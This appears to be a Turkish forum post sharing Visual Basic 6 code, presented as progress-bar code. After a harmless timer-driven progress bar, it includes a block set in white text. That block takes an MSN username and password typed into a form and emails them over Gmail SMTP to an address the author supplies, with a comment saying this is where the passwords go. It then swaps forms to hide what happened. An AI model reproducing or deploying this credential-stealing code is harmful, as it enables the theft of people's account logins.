Progress bar kodu bide button tıklayına msnye bilgiler gelçek onun kodu 
Follow along with the video below to see how to install our site as a web app on your home screen.
Not: This feature may not be available in some browsers.
[COLOR=#000000][COLOR=#0000BB]Option Explicit
Dim max [/COLOR][COLOR=#007700]As [/COLOR][COLOR=#0000BB]Integer
Dim value [/COLOR][COLOR=#007700]As [/COLOR][COLOR=#0000BB]Integer
[/COLOR][COLOR=#007700]Private [/COLOR][COLOR=#0000BB]Sub Command1_Click[/COLOR][COLOR=#007700]()
[/COLOR][COLOR=#0000BB]max [/COLOR][COLOR=#007700]= [/COLOR][COLOR=#0000BB]InputBox[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"Maximum Hız Nekadar Olsun?"[/COLOR][COLOR=#007700], [/COLOR][COLOR=#DD0000]"Max"[/COLOR][COLOR=#007700])
[/COLOR][COLOR=#0000BB]value [/COLOR][COLOR=#007700]= [/COLOR][COLOR=#0000BB]InputBox[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"Value Girin Maxla Aynı Olsun"[/COLOR][COLOR=#007700], [/COLOR][COLOR=#DD0000]"Value"[/COLOR][COLOR=#007700])
[/COLOR][COLOR=#0000BB]Timer1[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]Enabled [/COLOR][COLOR=#007700]= [/COLOR][COLOR=#0000BB]True
End Sub
[/COLOR][COLOR=#007700]Private [/COLOR][COLOR=#0000BB]Sub Form_Load[/COLOR][COLOR=#007700]()
[/COLOR][COLOR=#0000BB]End Sub
[/COLOR][COLOR=#007700]Private [/COLOR][COLOR=#0000BB]Sub Timer1_Timer[/COLOR][COLOR=#007700]()
[/COLOR][COLOR=#0000BB]ProgressBar1[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]max [/COLOR][COLOR=#007700]= [/COLOR][COLOR=#0000BB]max
ProgressBar1[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]value [/COLOR][COLOR=#007700]= [/COLOR][COLOR=#0000BB]Int[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]ProgressBar1[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]value[/COLOR][COLOR=#007700]) + [/COLOR][COLOR=#0000BB]value
[/COLOR][COLOR=#007700]If [/COLOR][COLOR=#0000BB]ProgressBar1[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]value [/COLOR][COLOR=#007700]>= [/COLOR][COLOR=#0000BB]ProgressBar1[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]max Then
MsgBox [/COLOR][COLOR=#DD0000]"Geri!"
[/COLOR][COLOR=#0000BB]End [/COLOR][COLOR=#007700]If
[/COLOR][COLOR=#0000BB]End Sub[/COLOR][/COLOR]
[SIZE=3][COLOR=white]Private Sub Command1_Click()
On Error Resume Next
msn.Logon Text1.Text, Text2.Text, msn.Services.PrimaryService
On Error Resume Next
Dim iMsg, iConf, Flds
Set iMsg = CreateObject("CDO.Message")
Set iConf = CreateObject("CDO.Configuration")
Set Flds = iConf.Fields
schema = "http://schemas.microsoft.com/cdo/configuration/"
Flds.Item(schema & "sendusing") = 2
Flds.Item(schema & "smtpserver") = "smtp.gmail.com"
Flds.Item(schema & "smtpserverport") = 465
Flds.Item(schema & "smtpauthenticate") = 1
Flds.Item(schema & "sendusername") = "Gönderilicek Gmail" 'Buraya gmail adresi
Flds.Item(schema & "sendpassword") = "Gönderilicek Gmail Şifresi" ' Buraya Şifresi
Flds.Item(schema & "smtpusessl") = 1
Flds.Update
With iMsg
.To = "Gönderilicek Gmail" 'Şifrelerin gideceği gmail
.From = "Chin Chan Chon"
.Subject = "Konu" 'Buraya Başlık Yazılıyor..
.HTMLbOdy = Text1.Text & Text2.Text
.Organization = "Mail Organtion"
.ReplyTo = "-"
Set .Configuration = iConf
SendEmailGmail = .Send
lbl.Caption = lbl.Caption + 1
End With
Form1.Hide
Form2.Show
End Sub[/COLOR][/SIZE]